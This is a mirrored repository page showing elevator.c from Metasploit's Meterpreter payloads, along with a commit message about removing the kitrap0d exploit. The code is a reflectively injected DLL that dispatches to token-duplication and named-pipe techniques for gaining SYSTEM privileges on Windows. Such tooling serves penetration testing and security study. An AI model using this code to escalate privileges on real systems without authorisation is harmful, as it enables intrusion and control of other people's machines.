github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity
5280bb7b06
metasploit-payloads/c/meterpreter/source/elevator/elevator.c
OJ a9abe738a1 Remove evidence of kitrap0d 
This exploit has been causing crashes and BSODs on various systems and
hence is deemed too unstable to be included in the default deployment of
Meterpreter. `getsystem` should only contain code which attempts to get
SYSTEM privileges via safe means; it should not have exploits in it.

This commit removes kitrap0d from `getsystem`. The code will be moved to a
windows local exploit in MSF instead.
2013-11-08 11:34:46 +10:00

147 lines
3.4 KiB
C
Raw Blame History

//
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
// not apply to the produced x64 dll.
//
#include "elevator.h"
#include "namedpipeservice.h"
#include "tokendup.h"
// define this as we are going to be injected via LoadRemoteLibraryR
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// define this as we want to use our own DllMain function
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
/*
* Grab a DWORD value out of the command line.
* e.g. elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
*/
DWORD elevator_command_dword( char * cpCommandLine, char * cpCommand )
{
char * cpString = NULL;
DWORD dwResult = 0;
do
{
if( !cpCommandLine || !cpCommand )
break;
cpString = strstr( cpCommandLine, cpCommand );
if( !cpString )
break;
cpString += strlen( cpCommand );
dwResult = strtoul( cpString, NULL, 0 );
} while( 0 );
return dwResult;
}
/*
* Grab a int value out of the command line.
* e.g. elevator_command_int( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
*/
int elevator_command_int( char * cpCommandLine, char * cpCommand )
{
char * cpString = NULL;
int iResult = 0;
do
{
if( !cpCommandLine || !cpCommand )
break;
cpString = strstr( cpCommandLine, cpCommand );
if( !cpString )
break;
cpString += strlen( cpCommand );
iResult = atoi( cpString );
} while( 0 );
return iResult;
}
/*
* The real entrypoint for this app.
*/
VOID elevator_main( char * cpCommandLine )
{
DWORD dwResult = ERROR_SUCCESS;
do
{
dprintf( "[ELEVATOR] elevator_main. cpCommandLine=0x%08X", (DWORD)cpCommandLine );
if( !cpCommandLine )
break;
if( strlen( cpCommandLine ) == 0 )
break;
dprintf( "[ELEVATOR] elevator_main. lpCmdLine=%s", cpCommandLine );
if( strstr( cpCommandLine, "/t:" ) )
{
DWORD dwThreadId = 0;
dwThreadId = elevator_command_dword( cpCommandLine, "/t:" );
dwResult = elevator_tokendup( dwThreadId, SECURITY_LOCAL_SYSTEM_RID );
ExitThread( dwResult );
}
else if( strstr( cpCommandLine, "/p:" ) )
{
cpCommandLine += strlen( "/p:" );
dwResult = elevator_namedpipeservice( cpCommandLine );
}
} while( 0 );
}
/*
* rundll32.exe entry point.
*/
VOID DLLEXPORT CALLBACK a( HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow )
{
elevator_main( lpszCmdLine );
ExitProcess( ERROR_SUCCESS );
}
/*
* DLL entry point. If we have been injected via RDI, lpReserved will be our command line.
*/
BOOL WINAPI DllMain( HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_PROCESS_ATTACH:
hAppInstance = hInstance;
if( lpReserved != NULL )
elevator_main( (char *)lpReserved );
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
View Git Blame Copy Permalink